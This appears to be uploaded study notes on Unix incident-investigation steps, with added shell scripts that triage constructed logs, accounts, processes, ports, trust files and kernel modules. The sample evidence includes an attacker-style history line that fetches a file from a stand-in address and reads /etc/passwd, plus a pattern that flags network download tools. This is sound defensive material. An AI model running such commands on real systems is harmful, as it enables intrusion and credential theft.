Q2) Write Down The Steps Involved in Unix System Investigation?

Uploaded by Andrea Fernandes

Q2) Write down the steps involved in Unix system investigation?

1. **Reviewing Pertinent Logs:**

Unix operating systems maintain various log files, located in directories like /var/log or /etc, which
can provide valuable insights during incident response. These logs document system activities such
as logons, startups, shutdowns, and network service events. It's essential to consult operating
system-specific documentation to locate relevant logs, as they may be stored in alternate directories
or even on network servers or security devices.

A. **Network Logging in Unix:**

1. **Syslog Functionality:**

- Syslog captures events from Unix programs and subsystems, controlled through the
/etc/syslog.conf configuration file.

- A syslog daemon, syslogd, logs messages and supports remote logging across networks, offering
flexible logging capabilities.

2. **Remote Syslog Server Logs:**

- Local log files generated by syslogd are typically readable by root only, posing a risk of
unauthorized modification.

- Redundant logging to remote syslog servers ensures log integrity, crucial in detecting and
responding to security breaches.

3. **TCP Wrapper Logging:**

- TCP Wrappers utilize syslog for logging connection attempts to protected services, aiding network
security monitoring.

4. **Other Network Logs:**

- Unix systems maintain service-specific network activity logs, like those for web servers, offering
insights into network activities.

B. **Host Logging:**

1. **Host Operation Logs:**

- Various log files in Unix track host operations, including su command execution, logged-on users,
logon attempts, and cron job execution.

2. **Logged-On User Logs:**

- The utmp or wtmp files store information about currently logged-on users, including username,
terminal used, and login time. Despite their binary format, they may still be vulnerable to
modification.

C. **User Activity Logging in Unix:**

1. **Shell Histories:**

- Command shells like Bourne (sh), Korn (ksh), or Bourne-Again (bash) log all user commands and
their options in history files stored in user home directories.

2. **Sample Excerpt from a Bash History File:**

- Bash maintains a history file recording user commands and options, offering insights into user
behavior and system interactions. Users can access this file to review their command history.
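A first pass over the log sources listed above, written as an added example that is not part of the original notes. Every syslog line, syslog.conf entry and shell-history line in the script is constructed sample data, and the function names are my own; on a live host the SAMPLE_* variables would be replaced by the real files.

```shell
#!/bin/sh
# Added example (not from the original notes): a first pass over the log
# sources listed in step 1. All input below is constructed sample data.

# Constructed syslog excerpt: an su to root, repeated failed SSH logins from
# one address, one accepted login, a TCP Wrappers refusal and a cron run.
SAMPLE_LOG='Mar 10 09:12:01 host1 su: pam_unix(su:session): session opened for user root by alice(uid=1000)
Mar 10 09:15:44 host1 sshd[2201]: Failed password for invalid user admin from 192.0.2.10 port 51514 ssh2
Mar 10 09:15:47 host1 sshd[2201]: Failed password for invalid user admin from 192.0.2.10 port 51516 ssh2
Mar 10 09:16:02 host1 sshd[2204]: Accepted publickey for bob from 198.51.100.7 port 40022 ssh2
Mar 10 09:20:13 host1 in.telnetd[2310]: refused connect from 192.0.2.10
Mar 10 10:01:00 host1 CRON[2400]: (root) CMD (run-parts /etc/cron.hourly)'

# Constructed /etc/syslog.conf: an "@host" action forwards to a remote server.
SAMPLE_CONF='auth,authpriv.*   /var/log/auth.log
*.*               @loghost.example.net
kern.*            /var/log/kern.log'

# Constructed ~/.bash_history excerpt.
SAMPLE_HISTORY='ls -la
cd /tmp
wget http://192.0.2.10/x.tgz
tar xzf x.tgz
cat /etc/passwd'

# failed_logins: number of failed SSH password attempts in the excerpt.
failed_logins() {
    printf '%s\n' "$SAMPLE_LOG" | grep -c 'Failed password'
}

# failed_login_sources: distinct source addresses behind those failures.
failed_login_sources() {
    printf '%s\n' "$SAMPLE_LOG" | grep 'Failed password' \
        | sed -n 's/.* from \([0-9.]*\) port .*/\1/p' | sort -u
}

# su_to_root_by: which user opened an su session to root.
su_to_root_by() {
    printf '%s\n' "$SAMPLE_LOG" | grep ' su: ' \
        | sed -n 's/.*for user root by \([^(]*\)(.*/\1/p'
}

# tcpwrapper_refusals: connection attempts that TCP Wrappers refused.
tcpwrapper_refusals() {
    printf '%s\n' "$SAMPLE_LOG" | grep -c 'refused connect from'
}

# remote_syslog_hosts: remote destinations configured in syslog.conf, if any.
# An empty result means the local copy is the only copy of the logs.
remote_syslog_hosts() {
    printf '%s\n' "$SAMPLE_CONF" | awk '$2 ~ /^@/ { print substr($2, 2) }'
}

# history_downloads: shell-history lines that fetched something over the network.
history_downloads() {
    printf '%s\n' "$SAMPLE_HISTORY" | grep -c -E '^(wget|curl|ftp|scp) '
}

# report: one-screen triage summary when the script is run directly.
report() {
    echo "failed logins: $(failed_logins) from $(failed_login_sources | tr '\n' ' ')"
    echo "su to root by: $(su_to_root_by)"
    echo "tcp wrapper refusals: $(tcpwrapper_refusals)"
    echo "remote syslog: ${remote:-$(remote_syslog_hosts)}"
    echo "network fetches in history: $(history_downloads)"
}

report
```

The same grep and sed patterns apply unchanged to the real files (`/var/log/auth.log`, `/var/log/messages`, `~/.bash_history`); the point of the remote_syslog_hosts check is that a local-only configuration means the log copy you are reading is the one an intruder with root could have edited.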

2. **Performing Keyword Searches:**

Keyword searches are a critical part of almost every incident response investigation, ranging
from email harassment to remote network compromise cases. Keywords can be a wide
range of ASCII strings, including an attacker's back door password, a username, a MAC
address, or an IP address. You can conduct keyword searches on the logical file structure or
at the physical level, examining the contents of an entire drive. (Logical and physical level
investigations are discussed in Chapter 11, which also covers some popular forensic utilities.)
Here, we'll concentrate on how to perform string searches using Unix utilities.
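An added example, not part of the original notes, of both search levels with only POSIX tools: a keyword list applied to an ordinary file (logical level) and to a blob of mixed printable and non-printable bytes standing in for a raw disk image (physical level). The files, the embedded strings and the keyword list are all constructed; the ascii_strings helper is a portable stand-in for strings(1), not that utility.

```shell
#!/bin/sh
# Added example (not from the original notes): keyword searches with POSIX
# tools at the logical level (a readable file) and at the byte level (a blob
# standing in for a raw disk image). All evidence here is constructed.

WORKDIR=$(mktemp -d)

# Logical level: an ordinary text file.
printf 'alice logged in from 198.51.100.7\nnothing to see here\n' > "$WORKDIR/notes.txt"

# Physical level: printable strings surrounded by non-printable bytes, the way
# they sit in unallocated space or inside a binary (constructed).
printf 'x\001\002\003BACKDOOR_PASS=letmein\377\376\375y 198.51.100.7 z\n' > "$WORKDIR/image.bin"

# Keyword list, one fixed string per line, in the form grep -f expects.
printf '198.51.100.7\nletmein\n' > "$WORKDIR/keywords.txt"

# ascii_strings FILE: emit runs of printable ASCII, one per line. This is a
# portable stand-in for strings(1): turn every non-printable byte into a
# newline and drop the empty lines that produces.
ascii_strings() {
    LC_ALL=C tr -c '[:print:]\n' '\n' < "$1" | grep -v '^$'
}

# keyword_hits FILE KEYWORDFILE: number of printable runs containing any keyword.
keyword_hits() {
    ascii_strings "$1" | grep -c -F -f "$2"
}

# keyword_context FILE KEYWORD: the printable run(s) around one keyword, which
# is usually what tells you whether a hit matters.
keyword_context() {
    ascii_strings "$1" | grep -F -- "$2"
}

# search_tree DIR KEYWORDFILE: apply the byte-level search to every regular
# file under a directory, printing "count path" for files with at least one
# hit (the keyword file itself is skipped).
search_tree() {
    find "$1" -type f ! -name "$(basename "$2")" | while read -r f; do
        n=$(keyword_hits "$f" "$2")
        [ "$n" -gt 0 ] && echo "$n $f"
    done
}

search_tree "$WORKDIR" "$WORKDIR/keywords.txt"
```

Pointing ascii_strings at a device node or image file (`ascii_strings /dev/sdb1` on a read-only mounted or imaged disk) gives the physical-level search the text describes; the same keyword file then serves both levels.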

3. **Review Relevant Files:**

Investigating relevant files involves examining critical system files, configuration files,
and user files for any anomalies or unauthorized modifications. This includes files such
as system configuration files (/etc), user profiles and home directories, log files,
executable binaries, and any other files pertinent to the system's operation. By
reviewing these files, investigators can identify potential security issues, unauthorized
changes, or evidence of malicious activity.

4. **Identify Unauthorized User Accounts or Groups:**

- Detecting unauthorized user accounts or groups is crucial for uncovering potential
security breaches or unauthorized access to the system. Investigators can examine the
system's user database (e.g., /etc/passwd, /etc/shadow) to identify any accounts that do
not belong to legitimate users or were created without proper authorization. Similarly,
checking group memberships and permissions can help identify any unauthorized groups
with elevated privileges.
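The account and group checks described above, as an added example that is not from the original notes. The passwd, shadow and group contents and the baseline account list are constructed (hash fields are shortened to the placeholder HASH); the function names are my own. On a live system the SAMPLE_* variables would be replaced by the real files, and the baseline by the build record or a trusted backup.

```shell
#!/bin/sh
# Added example (not from the original notes): checks over constructed copies
# of /etc/passwd, /etc/shadow and /etc/group.

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sysadm:x:0:0::/tmp:/bin/sh
bob:x:1001:1001:Bob:/home/bob:/bin/bash'

# Hash fields shortened to HASH; an empty second field means no password is needed.
SAMPLE_SHADOW='root:HASH:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:HASH:19000:0:99999:7:::
sysadm::19000:0:99999:7:::
bob:HASH:19000:0:99999:7:::'

SAMPLE_GROUP='root:x:0:
wheel:x:10:alice,bob
users:x:100:alice'

# Known-good account list for this host (constructed baseline).
BASELINE_USERS='root
daemon
alice
bob'

# extra_uid0_accounts: any UID 0 account other than root is a second root login.
extra_uid0_accounts() {
    printf '%s\n' "$SAMPLE_PASSWD" | awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# empty_password_accounts: accounts whose shadow entry has no hash at all.
empty_password_accounts() {
    printf '%s\n' "$SAMPLE_SHADOW" | awk -F: '$2 == "" { print $1 }'
}

# odd_home_accounts: interactive accounts whose home directory is somewhere
# other than /home or /root (a scratch directory is a common sign of a dropped account).
odd_home_accounts() {
    printf '%s\n' "$SAMPLE_PASSWD" \
        | awk -F: '$7 !~ /nologin|false$/ && $6 !~ /^\/(home|root)/ { print $1 }'
}

# group_members GROUP: the supplementary members of an administrative group.
group_members() {
    printf '%s\n' "$SAMPLE_GROUP" | awk -F: -v g="$1" '$1 == g { print $4 }'
}

# unexpected_accounts: usernames present now but absent from the baseline.
unexpected_accounts() {
    tmp=$(mktemp -d)
    printf '%s\n' "$SAMPLE_PASSWD" | cut -d: -f1 | LC_ALL=C sort > "$tmp/now"
    printf '%s\n' "$BASELINE_USERS" | LC_ALL=C sort > "$tmp/base"
    LC_ALL=C comm -23 "$tmp/now" "$tmp/base"
    rm -rf "$tmp"
}

echo "extra UID 0 accounts: $(extra_uid0_accounts)"
echo "accounts with no password: $(empty_password_accounts)"
echo "interactive accounts with odd home: $(odd_home_accounts)"
echo "wheel members: $(group_members wheel)"
echo "accounts not in baseline: $(unexpected_accounts)"
```

The baseline comparison is the most reliable of the five checks; the others catch common patterns but a carefully crafted account (normal UID, proper home, valid hash) only shows up as a name the baseline does not know.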

5. **Identify Rogue Processes:**

- Rogue processes are unauthorized or malicious programs running on the system that may pose
security risks or compromise system integrity. Investigators can use tools like ps (process status) or
top to view a list of running processes and analyze their attributes. Suspicious indicators include
processes with unusual names, unknown or unauthorized process owners, high resource
consumption, suspicious network connections, or processes executing unusual commands.
Identifying and terminating rogue processes is essential for restoring system security and stability.
Before terminating one, record its attributes (binary path, owner, open files, network connections),
since that volatile evidence disappears with the process.

7. **Check for Unauthorized Access Points:**

- Unauthorized access points, such as open ports or network services, can provide entry points for
attackers to infiltrate the system. Investigators should examine the system's network configuration
and firewall rules to identify any unauthorized or unnecessary services running on the system. Tools
like netstat or nmap can be used to scan for open ports and active network connections. Closing
unnecessary ports and disabling unused services can help mitigate the risk of unauthorized access
and potential security breaches.
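An added example, not from the original notes, that works the rogue-process step and the access-point step together: the process list and the listening-socket list are cross-referenced so that an unexpected listener is tied back to the binary behind it. The `ps -eo pid,user,pcpu,args`-style and `netstat -tlnp`-style output, the PIDs and the port allowlist are all constructed; on a live system the SAMPLE_* variables would hold the real command output.

```shell
#!/bin/sh
# Added example (not from the original notes): triage of constructed
# ps and netstat output. Nothing below is real process or socket data.

SAMPLE_PS='PID USER %CPU COMMAND
1 root 0.0 /sbin/init
812 root 0.1 /usr/sbin/sshd -D
1340 www-data 0.0 /usr/sbin/apache2 -k start
2210 nobody 97.5 /tmp/.x/kworkerd
2311 root 0.0 /dev/shm/.s/httpd'

SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local-Address Foreign-Address State PID/Program
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 812/sshd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 900/master
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1340/apache2
tcp 0 0 0.0.0.0:31337 0.0.0.0:* LISTEN 2210/kworkerd
tcp 0 0 10.0.0.5:22 192.0.2.10:51900 ESTABLISHED 2250/sshd'

# Ports the system is documented to serve (constructed allowlist).
EXPECTED_PORTS='22 25 80'

# processes_from_scratch_dirs: PIDs whose executable lives in a world-writable
# scratch directory, a common home for dropped binaries.
processes_from_scratch_dirs() {
    printf '%s\n' "$SAMPLE_PS" \
        | awk 'NR > 1 && $4 ~ /^\/(tmp|var\/tmp|dev\/shm)\// { print $1 }'
}

# cpu_hogs THRESHOLD: PIDs using more than THRESHOLD percent CPU.
cpu_hogs() {
    printf '%s\n' "$SAMPLE_PS" | awk -v t="$1" 'NR > 1 && $3 + 0 > t { print $1 }'
}

# unexpected_listeners: listening sockets whose port is not in EXPECTED_PORTS,
# printed as "port pid/program".
unexpected_listeners() {
    printf '%s\n' "$SAMPLE_NETSTAT" | awk -v allow="$EXPECTED_PORTS" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $6 == "LISTEN" { m = split($4, h, ":"); port = h[m]; if (!(port in ok)) print port, $7 }'
}

# listener_pid PORT: the PID behind a listening port.
listener_pid() {
    printf '%s\n' "$SAMPLE_NETSTAT" \
        | awk -v p="$1" '$6 == "LISTEN" && $4 ~ (":" p "$") { split($7, x, "/"); print x[1] }'
}

# report: the cross-check an investigator wants, which processes running from
# a scratch directory are also listening on the network.
report() {
    for pid in $(processes_from_scratch_dirs); do
        printf '%s\n' "$SAMPLE_NETSTAT" \
            | awk -v p="$pid" '$6 == "LISTEN" && $7 ~ ("^" p "/") { print "pid " p " listens on " $4 }'
    done
}

report
```

A process that both runs from /tmp or /dev/shm and owns an unexpected listening port is the strongest signal in this data; on a live host, confirm it through /proc/PID/exe and /proc/PID/fd before acting, because ps and netstat themselves may have been replaced.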

8. **Analyze Trust Relationships:**

- Trust relationships refer to the level of trust established between users, groups, systems, and
external entities. Investigating trust relationships involves analyzing user permissions, group
memberships, access control lists (ACLs), and network trust configurations. Investigators should
assess the trustworthiness of user accounts, evaluate privileges granted to users and groups, and
review access controls to sensitive resources. Identifying and addressing trust relationship
vulnerabilities is essential for maintaining system security and preventing unauthorized access or
privilege escalation.
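A review of the classic Unix trust files, as an added example that is not from the original notes: the r-command files (/etc/hosts.equiv and ~/.rhosts), a sudoers file and an NFS exports file. Which files count as trust configuration on a given host is an assumption; the file contents below are constructed, and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the original notes): review of constructed trust
# configuration. Replace the SAMPLE_* variables with the real files on a host.

# r-command trust: a "+" in the host or user field trusts everyone.
SAMPLE_HOSTS_EQUIV='+
trusted.example.net alice'

SAMPLE_RHOSTS='+ +
devbox.example.net bob'

SAMPLE_SUDOERS='root ALL=(ALL:ALL) ALL
%wheel ALL=(ALL) ALL
deploy ALL=(ALL) NOPASSWD: ALL
backup ALL=(root) NOPASSWD: /usr/bin/rsync'

SAMPLE_EXPORTS='/srv/data 10.0.0.0/24(ro,root_squash)
/srv/build *(rw,no_root_squash)'

# wildcard_trust_lines CONTENT: number of r-command entries that trust any
# host or any user.
wildcard_trust_lines() {
    printf '%s\n' "$1" | awk '$1 == "+" || $2 == "+" { n++ } END { print n + 0 }'
}

# nopasswd_all_sudo: principals that may run any command as anyone with no password.
nopasswd_all_sudo() {
    printf '%s\n' "$SAMPLE_SUDOERS" | awk '/NOPASSWD:[[:space:]]*ALL$/ { print $1 }'
}

# risky_exports: NFS exports writable by every client with root not squashed,
# so a remote root becomes root on the exported tree.
risky_exports() {
    printf '%s\n' "$SAMPLE_EXPORTS" \
        | awk '$2 ~ /^\*\(/ && $2 ~ /rw/ && $2 ~ /no_root_squash/ { print $1 }'
}

echo "hosts.equiv wildcard entries: $(wildcard_trust_lines "$SAMPLE_HOSTS_EQUIV")"
echo ".rhosts wildcard entries: $(wildcard_trust_lines "$SAMPLE_RHOSTS")"
echo "unrestricted NOPASSWD sudo: $(nopasswd_all_sudo)"
echo "risky NFS exports: $(risky_exports)"
```

Each hit is a path by which an attacker who controls one account or one host gets another without a password, which is exactly the privilege-escalation route the step warns about.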

9. **Check for Kernel Module Rootkits:**

- Kernel module rootkits are malicious software components that modify or manipulate the
kernel's behavior to evade detection and gain unauthorized access to the system. Investigators can
use tools like chkrootkit or rkhunter to scan for suspicious kernel modules, hidden processes, or
system anomalies indicative of rootkit activity. Additionally, verifying the integrity of critical system
files and monitoring system calls and kernel logs can help detect and mitigate the impact of kernel-
level compromises. Removing or patching vulnerable kernel modules and implementing secure boot
mechanisms can enhance system resilience against rootkit attacks.
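Two of the cross-checks that chkrootkit-style tools automate, as an added example that is not from the original notes: PIDs that answer in /proc but are missing from ps (a rootkit hooking directory listing hides the process from one view but not the other), and loaded modules that differ from a baseline or that the kernel logged as tainting. The PID lists, module list, baseline and kernel log lines are all constructed; the module name xyz_helper is a placeholder.

```shell
#!/bin/sh
# Added example (not from the original notes): two rootkit cross-checks over
# constructed data. None of this is real output from a host.

# Constructed: numeric entries seen when walking /proc ...
PROC_PIDS='1 812 900 1340 2210 2311'
# ... versus the PIDs ps reported.
PS_PIDS='1 812 900 1340 2210'

# Constructed /proc/modules excerpt (module name is the first field).
SAMPLE_MODULES='ext4 700000 1 - Live 0x0000000000000000
e1000 200000 0 - Live 0x0000000000000000
xyz_helper 16384 0 - Live 0x0000000000000000 (OE)'

# Baseline module list from a known-good build of the same host (constructed).
BASELINE_MODULES='ext4 e1000'

# Constructed kernel log lines; the two taint messages are the ones the kernel
# prints when it loads an out-of-tree or unsigned module.
SAMPLE_DMESG='[    1.2] e1000: Intel(R) PRO/1000 Network Driver
[  900.5] xyz_helper: loading out-of-tree module taints kernel.
[  900.5] xyz_helper: module verification failed: signature and/or required key missing - tainting kernel'

# hidden_pids: PIDs present in /proc but missing from ps output.
hidden_pids() {
    for p in $PROC_PIDS; do
        case " $PS_PIDS " in *" $p "*) ;; *) echo "$p" ;; esac
    done
}

# unknown_modules: loaded modules absent from the baseline.
unknown_modules() {
    printf '%s\n' "$SAMPLE_MODULES" | awk -v base="$BASELINE_MODULES" '
        BEGIN { n = split(base, b, " "); for (i = 1; i <= n; i++) ok[b[i]] = 1 }
        !($1 in ok) { print $1 }'
}

# taint_messages: kernel log lines recording out-of-tree or unsigned module loads.
taint_messages() {
    printf '%s\n' "$SAMPLE_DMESG" | grep -c -E 'taints kernel|tainting kernel'
}

# tainted_modules: the module names those messages refer to.
tainted_modules() {
    printf '%s\n' "$SAMPLE_DMESG" | grep -E 'taint' \
        | sed 's/^\[[^]]*\] \([^:]*\):.*/\1/' | sort -u
}

echo "PIDs hidden from ps: $(hidden_pids | tr '\n' ' ')"
echo "modules not in baseline: $(unknown_modules | tr '\n' ' ')"
echo "taint messages: $(taint_messages) (modules: $(tainted_modules | tr '\n' ' '))"
```

On a live host the PID lists come from `ls /proc` and `ps -e`, the module list from /proc/modules, and the log lines from dmesg or /var/log/kern.log; a module that hides itself from /proc/modules still leaves the taint message behind unless the log was cleaned, which is why the log and the module list are checked separately.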
